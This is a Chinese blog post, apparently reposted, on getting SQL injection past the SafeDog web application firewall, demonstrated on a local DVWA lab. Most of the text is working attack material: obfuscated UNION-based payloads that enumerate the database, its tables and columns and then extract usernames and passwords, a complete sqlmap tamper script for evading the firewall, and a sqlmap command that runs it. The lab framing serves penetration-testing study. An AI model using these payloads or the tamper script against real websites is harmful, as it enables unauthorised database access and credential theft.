摘要:查看安全狗防御规则匹配库。绕过分析字符绕过方法手工绕过判断列数。查询数据库名。获取字段内容。
网站安全狗下载地址:
网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.html
DVWA下载:
链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ 提取码:kun6 --来自百度网盘超级会员V3的分享
已DVWA SQL注入为例对网站安全狗进行绕过测试。
字符 | 绕过方法 |
and |
|
order by |
|
union select |
|
database() |
|
from information_schema.tables |
|
from information_schema.tables |
|
count(*) | count(1) |
1.判断列数。?id=5"/**/order/*/%0a*a*/by/**/1/**/--+?id=5"/**/order/*/%0a*a*/by/**/2/**/--+?id=5"/**/order/*/%0a*a*/by/**/3/**/--+2.判断显示位。?id=5"/*//*/union/*!88888cas*//*/%0a*a*/select/*//*//*//*/1,2/*//*/--+?id=5"/**//*!14400and*//**/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/*//*//*//*/1,2/*//*/--+3.查询数据库名。?id=5"/*!14400and*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/database(/*%%!AJEST%%%%*/),2/**/--+4.查询所有的表名。?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/table_name,2/*//*//*!from--%0f/*%0ainformation_schema.tables*//*//*/where table_schema=database(/*%%!AJEST%%%%*/)/**/--+?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/table_name,2/*//*//*!from--%0f/*%0ainformation_schema.tables*//*//*/where table_schema=database(/*%%!AJEST%%%%*/)/**/limit/*//*/0,1--+?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/group_concat(table_name),2/*//*//*!from--%0f/*%0ainformation_schema.tables*//*//*/where table_schema=database(/*%%!AJEST%%%%*/)/**/--+5.获取字段名字。?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/column_name,2/*//*//*!from--%0f/*%0ainformation_schema.columns*//*//*/where table_name="users"/*//*//*!14400and*//*//*/table_schema=database(/*%%!AJEST%%%%*/)--+?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/column_name,2/*//*//*!from--%0f/*%0ainformation_schema.columns*//*//*/where table_name="users"/*//*//*!14400and*//*//*/table_schema=database(/*%%!AJEST%%%%*/)/*//*//*!limit*//*//*/0,1/*//*/--+?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/column_name,2/*//*//*!from--%0f/*%0ainformation_schema.columns*//*//*/where table_name="users"/*//*//*!14400and*//*//*/table_schema=database(/*%%!AJEST%%%%*/)--+6.获取字段内容。?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/user,password/*//*//*!from*//*//*/users --+?id=5"/*//*//*!14400and*//*//*/1=2/*//*/union/*!88888cas*//*/%0a*a*/select/**//*//*/user,password/*//*//*!from*//*//*/users/*//*//*!limit*//*//*/0,1/*//*/ --+
#!/usr/bin/env python"""Copyright (c) 2006-2019 sqlmap developers ([url]http://sqlmap.org/[/url])See the file "LICENSE" for copying permissionAuthor:LUSHUN"""import reimport osfrom lib.core.data import kbfrom lib.core.enums import PRIORITYfrom lib.core.common import singleTimeWarnMessagefrom lib.core.enums import DBMS__priority__ = PRIORITY.LOWdef dependencies(): singleTimeWarnMessage("Bypass safedog4.0"%s" only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))def tamper(payload, **kwargs): payload=payload.replace("AND","/*!11440AND*/") payload=payload.replace("ORDER","order/*!77777cz*/") payload=payload.replace("SELECT","/*!11440SELECT*/") payload=payload.replace("SLEEP(","sleep/*!77777cz*/(") payload=payload.replace("UPDATEXML(","UPDATEXML/*!77777cz*/(") payload=payload.replace("SESSION_USER()","/*!11440SESSION_USER()*/") payload=payload.replace("USER())","USER/*!77777cz*/())") payload=payload.replace("DATABASE()","DATABASE/*!77777cz*/()") payload=payload.replace("ORDER BY","/**/order/*/%0a*a*/by/**/") payload=payload.replace("UNION","union/*!88888cas*/") payload=payload.replace("UNION","union/*!88888cas*/") payload=payload.replace("from information_schema.tables","/*!from--%0f/*%0ainformation_schema.tables*/") payload=payload.replace("from information_schema.columns","/*!from--%0f/*%0ainformation_schema.columns*/") payload=payload.replace("count(*)","count(1)") payload=payload.replace("as","/*!14400as*/") payload=payload.replace("char","/*!14400char*/") return payload
sqlmap -u "http://192.168.174.133/DVWA-master/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie "security=low; security=low; PHPSESSID=hp0jf1elvpjdg8jdk08j4rik56" -p id --tamper "safedogbypass" --random-agent -v3 --dbs --fresh-queries
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/121458.html
摘要:白盒测试是指在拥有客户组织所有的资产信息的情况下进行渗透测试。信息分析对搜集到的信息进行分析,为下一步实施渗透测试做准备。形成报告按照与客户确定好的范围需求整理渗透测试结果并将资料形成报告。 第1章 渗透测试概述 1.信息安全发展史 2.信息安全行业的现状 2.1渗透测试...
摘要:登录注册安全风险登录注册的风险点主要有四个暴力破解撞库遍历注册用户批量注册。引入了验证码机制同样引入了额外的安全风险,比如短信验证码的短信炸弹风险图形验证码的可绕过可识别等。 概述 很多技术研发不了解安全,也不重视安全,只有在自己的服务器被黑掉、被挂马、被脱裤才想起关注安全,但是这个时候,技术架构已经成型、代码已经在线上稳定运行,再亡羊补牢,改代码、改策略,往往成本巨大、确收效很低。所...
摘要:但是,你所用的写法真的安全吗面对越来越猖獗的黑客攻击,注入防范非常重要,所以使用也要有更正确的姿势。关于注入就是通过把命令插入到表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的命令。 大多数 PHP 程序员对 MySQL 肯定不陌生,至于各种 MySQL 函数的用法在开发手册和 w3school 这类网站上也有很多介绍。但是,你所用的写法真的安全吗?面对越来越猖獗...
摘要:但是,你所用的写法真的安全吗面对越来越猖獗的黑客攻击,注入防范非常重要,所以使用也要有更正确的姿势。关于注入就是通过把命令插入到表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的命令。 大多数 PHP 程序员对 MySQL 肯定不陌生,至于各种 MySQL 函数的用法在开发手册和 w3school 这类网站上也有很多介绍。但是,你所用的写法真的安全吗?面对越来越猖獗...
阅读 3232·2021-09-29 09:32
阅读 1200·2019-08-30 12:54
阅读 1756·2019-08-30 11:16
阅读 1486·2019-08-30 10:50
阅读 2314·2019-08-29 16:17
阅读 1127·2019-08-26 12:17
阅读 1255·2019-08-26 10:15
阅读 2253·2019-08-23 18:38